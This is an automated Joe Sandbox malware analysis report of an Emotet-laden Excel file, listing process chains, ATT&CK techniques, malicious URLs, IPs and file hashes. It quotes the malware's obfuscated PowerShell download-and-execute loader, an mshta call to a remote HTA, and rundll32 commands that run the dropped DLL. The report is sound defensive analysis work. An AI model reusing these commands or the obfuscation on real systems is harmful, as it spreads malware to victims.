                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: rundll32.exe, 0000000F.00000002.613710689.000000000078A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D374 mov eax, dword ptr fs:[00000030h]9_2_0035D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043D374 mov eax, dword ptr fs:[00000030h]10_2_0043D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048D374 mov eax, dword ptr fs:[00000030h]11_2_0048D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027D374 mov eax, dword ptr fs:[00000030h]12_2_0027D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034D374 mov eax, dword ptr fs:[00000030h]14_2_0034D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.htmlJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
                            Source: Yara match | File source: 80_513972285.xls, type: SAMPLE
                            Source: Yara match | File source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA, 9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA, 11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA

                            Stealing of Sensitive Information

                            Source: Yara match | File source: C:\ProgramData\QWER.dll, type: DROPPED
                            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                            Valid Accounts | 21 Scripting | 1 Windows Service | 1 Windows Service | 1 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 13 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                            Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                            Domain Accounts | 13 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 21 Scripting | Security Account Manager | 38 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                            Local Accounts | 11 Command and Scripting Interpreter | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 122 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
                            Cloud Accounts | 1 Service Execution | Network Logon Script | Network Logon Script | 2 Masquerading | LSA Secrets | 1 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                            Replication Through Removable Media | 1 PowerShell | Rc.common | Rc.common | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                            External Remote Services | Scheduled Task | Startup Items | Startup Items | 11 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Rundll32 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Behavior Graph
ID: 562424
Sample: 80_513972285.xls
Startdate: 28/01/2022
Architecture: WINDOWS
Score: 100

Sample-level network and signatures:
• 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia
• 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia
• 31 other IPs or domains
• Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
• Multi AV Scanner detection for domain / URL
• Found malware configuration
• 17 other signatures

Process chain (each process is started by the one listed before it):
• EXCEL.EXE
  dropped: C:\Users\user\Desktop\80_513972285.xls, Composite
• cmd.exe
• mshta.exe
  network: 91.240.118.168, 49167, 49168, 80 GLOBALLAYERNL unknown
• powershell.exe
  network: kuyporn.com 172.67.149.209, 49169, 80 CLOUDFLARENETUS United States
  network: jeffreylubin.igclout.com 74.208.236.157, 49170, 80 ONEANDONE-ASBrauerstrasse48DE United States
  dropped: C:\ProgramData\QWER.dll, PE32
  signature: Powershell drops PE file
• cmd.exe
• rundll32.exe
• rundll32.exe
  dropped: C:\Windows\...\kcktqpyucuj.sda (copy), PE32
  signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
• rundll32.exe
• rundll32.exe
  signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
• rundll32.exe

Source | Detection | Scanner | Label | Link
80_513972285.xls | 33% | ReversingLabs | Document-Excel.Trojan.Emotet |

Source | Detection | Scanner | Label | Link
C:\ProgramData\QWER.dll | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
kuyporn.com | 10% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
kuyporn.com | 172.67.149.209 | true | true | | unknown
jeffreylubin.igclout.com | 74.208.236.157 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://jeffreylubin.igclout.com/wp-admin/vzOG/ | true | Avira URL Cloud: malware | unknown
http://kuyporn.com/wp-content/XSs5/ | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/qqw/aas/se.html | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/qqw/aas/se.png | true | Avira URL Cloud: malware | unknown
                                    https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://91.240.118.168/qqw/aas/se.htmlmshtamshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://pcovestudio.com/wp-adminpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562424
Start date: 28.01.2022
Start time: 21:23:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 5s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 80_513972285.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@25/9@2/36
EGA Information:
• Successful, ratio: 71.4%
HDC Information:
• Successful, ratio: 18.1% (good quality ratio 17.1%)
• Quality average: 72%
• Quality standard deviation: 25.6%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 53
• Number of non-executed functions: 193
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 2840 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 3012 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:24:20 | API Interceptor | 62x Sleep call for process: mshta.exe modified
21:24:24 | API Interceptor | 441x Sleep call for process: powershell.exe modified
21:24:42 | API Interceptor | 114x Sleep call for process: rundll32.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                    • 66.42.57.149
                                                                                                                    x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    DIGITALOCEAN-ASNUSAttachment-2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    DOCUMENT_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    DETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.0041232632621595
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGOUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTn7yDx6BrWt
                                                                                                                    MD5:DF8A5542B86A487AD0C0581E11F0B5EB
                                                                                                                    SHA1:170867F21CA9A1B9CACC84336441449BAE0D4911
                                                                                                                    SHA-256:69DB5ABABB04BC8A6805647D738E69663ADDACF57AAD0CB9384B60804260A266
                                                                                                                    SHA-512:F8E739A1CCBF86AD6B694E4AF44121117373B775C262889F54EFDE52ECC439A358A9C148AD527490FACBA3EDA439F2379CF032B0E36C17CB4324C85C2BA28525
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Process:C:\Windows\System32\mshta.exe
                                                                                                                    File Type:data
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):11230
                                                                                                                    Entropy (8bit):6.174353476920402
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:aYVCkQn+a8Ytu3jBoYwMxsybTH8lNQwAB3fEbMH4+juo8w8q0T1fEnXAdZl+gpX:aYUkNa8ZBoYwMDXH8lNbs8BJZl+WX
                                                                                                                    MD5:3CDAF9C34211A5219808433770A34E72
                                                                                                                    SHA1:A16F4AC4AF7E46FF84E330BF50A9B6AA6A9A93EC
                                                                                                                    SHA-256:CD29D9E79ED2874B6597961173BA7EF09B5F2295CF330BFDAEFF84459EBC58FB
                                                                                                                    SHA-512:489E0C619AC80BBE287D8C9C339A11932CB8991EFBD29D536B3D45F9259D325551DF9DC6B1B38DFC4B72051CB05C856C81F9B767CE66A910FE3876927CE657C2
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):2.664554788742027
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:YxsINg5+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cML:YY+nBqmIk3hbdlylKsgqopeJBWhZFGk7
                                                                                                                    MD5:534B016025B9A11F0776BBE070BC9EBC
                                                                                                                    SHA1:23D5520395E4BC1DF6ADE5661554F1DD387DB5CA
                                                                                                                    SHA-256:6CE3127C861EB2D24C2CB18AD25C43FB09DC0D15AC4F9C727553C6B30D75BF3D
                                                                                                                    SHA-512:09D74BFD0E1422045B40ED37C12EE5380D319F867977725917CE16567012E25562EDDE24E7334073BB59E81DF766501B54A8FD1B9F5D7E66DF9E84BBD57D124D
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.58430027744578
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCcMqKqvsqvJCwofz8hQCcMqKqvsEHyqvJCworZzIuYnH8UVhxlUVNA2:cizofz8inHnorZzISUVhwA2
                                                                                                                    MD5:BBF24C74B986F6F6C20B1E5FDB284B55
                                                                                                                    SHA1:7ABC527DFA9B1042FE33CEB2A1E45EDB899283D2
                                                                                                                    SHA-256:CDAA6B0B445AB013223918A3E7D6275E7678F7614417671E68168F1800A9781C
                                                                                                                    SHA-512:F8DACF2FF7E4A6417858C68BA4FEE02B4917EEA8819188ABF119008269B468F99B00862308DE35ABCB58FDDF86C713CDDDBCA291BC56BA169948D702E2A8202D
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77312
                                                                                                                    Entropy (8bit):5.8321952104972015
